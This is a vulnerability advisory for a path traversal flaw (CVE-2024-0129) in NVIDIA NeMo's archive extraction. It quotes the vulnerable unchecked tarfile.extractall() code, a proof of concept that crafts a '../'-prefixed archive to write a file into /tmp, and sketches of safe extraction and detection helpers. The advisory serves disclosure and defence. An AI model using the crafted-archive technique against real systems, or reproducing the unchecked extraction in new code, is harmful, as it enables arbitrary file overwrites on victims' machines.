NVIDIA NeMo
Vulnerability Report

Unsafe extraction of NeMo archive leading to arbitrary file write

CVE Number

CVE-2024-0129

Summary

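The _unpack_nemo_file function, which the SaveRestoreConnector class uses when loading models, calls tarfile.extractall() without validating the paths of the archive members. A crafted NeMo archive can therefore write files outside the intended extraction folder, leading to an arbitrary file write when the model is loaded.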

Products Impacted

This vulnerability is present in NVIDIA NeMo versions prior to r2.0.0rc0.

CVSS Score: 6.3

AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE Categorization

CWE‑22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

Details

The cause of this vulnerability is in the _unpack_nemo_file function within the file /nemo/core/connectors/save_restore_connector.py.

    def _unpack_nemo_file(path2file: str, out_folder: str, extract_config_only: bool = False) -> str:
        if not os.path.exists(path2file):
            raise FileNotFoundError(f"{path2file} does not exist")

        # we start with an assumption of uncompressed tar,
        # which should be true for versions 1.7.0 and above
        tar_header = "r:"
        try:
            tar_test = tarfile.open(path2file, tar_header)
            tar_test.close()
        except tarfile.ReadError:
            # can be older checkpoint => try compressed tar
            tar_header = "r:gz"
        tar = tarfile.open(path2file, tar_header)
        if not extract_config_only:
            tar.extractall(path=out_folder)
        else:
            members = [x for x in tar.getmembers() if ".yaml" in x.name]
            tar.extractall(path=out_folder, members=members)
        tar.close()
        return out_folder

The _unpack_nemo_file function is used by several functions and classes in NVIDIA NeMo, most notably the SaveRestoreConnector class which is used to save and load NeMo model files from disk.
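For contrast with the function above, the following is a minimal sketch of extraction that checks every member path before writing anything. It is not the fix NVIDIA shipped; the helper name safe_extract and its policy of rejecting all link members are assumptions made for illustration. Newer Python versions also accept a filter argument to extractall() that can enforce similar restrictions.

```python
import os
import tarfile


def safe_extract(tar: tarfile.TarFile, out_folder: str) -> None:
    """Extract `tar` into `out_folder`, refusing members that would land outside it.

    Hypothetical helper for illustration; not part of NeMo.
    """
    root = os.path.realpath(out_folder)
    for member in tar.getmembers():
        # Links can redirect later writes, so this sketch rejects them outright.
        if member.issym() or member.islnk():
            raise ValueError(f"refusing link member: {member.name}")
        # Resolve the final on-disk location and require it to stay under root.
        target = os.path.realpath(os.path.join(root, member.name))
        if os.path.commonpath([root, target]) != root:
            raise ValueError(f"refusing member outside {root}: {member.name}")
    # Every member was checked, so nothing is written if any check failed.
    tar.extractall(path=out_folder)
```

Validating all members before calling extractall() means a malicious archive is rejected as a whole rather than partially extracted.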

To reproduce this vulnerability, create a tar archive containing a file whose member name includes parent-directory (../) components, then load the archive with the SaveRestoreConnector restore_from function:

    import tarfile

    # Create a harmless payload file to place in the archive
    with open("test.txt", "w") as f:
        f.write("This is a test file")

    # Prefix the member name with ../ components so it resolves outside the extraction folder
    def change_name(tarinfo):
        tarinfo.name = "../../../../../../../../tmp/" + tarinfo.name
        return tarinfo

    with tarfile.open("test.nemo", "w:gz") as tar:
        tar.add("test.txt", filter=change_name)

    # Load the archive with restore_from
    import nemo.collections.asr as nemo_asr
    model = nemo_asr.models.EncDecDiarLabelModel.restore_from(restore_path="test.nemo")

This results in test.txt being written to the /tmp/ directory.
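A crafted archive like the one above can be spotted without extracting it by listing its member names. The sketch below is a simple lexical check; the function name list_traversal_members is hypothetical, and the check assumes forward-slash separators in member names. It does not detect link-based escapes.

```python
import tarfile


def list_traversal_members(archive_path: str) -> list:
    """Return member names that are absolute or contain a '..' path component.

    Hypothetical helper for illustration; it reads the archive index only.
    """
    # "r:*" lets tarfile detect compression, so plain and gzip archives both work.
    with tarfile.open(archive_path, "r:*") as tar:
        return [
            name
            for name in tar.getnames()
            if name.startswith("/") or ".." in name.split("/")
        ]
```

Calling list_traversal_members("test.nemo") on the archive built above should return the single member whose name begins with the ../ sequence.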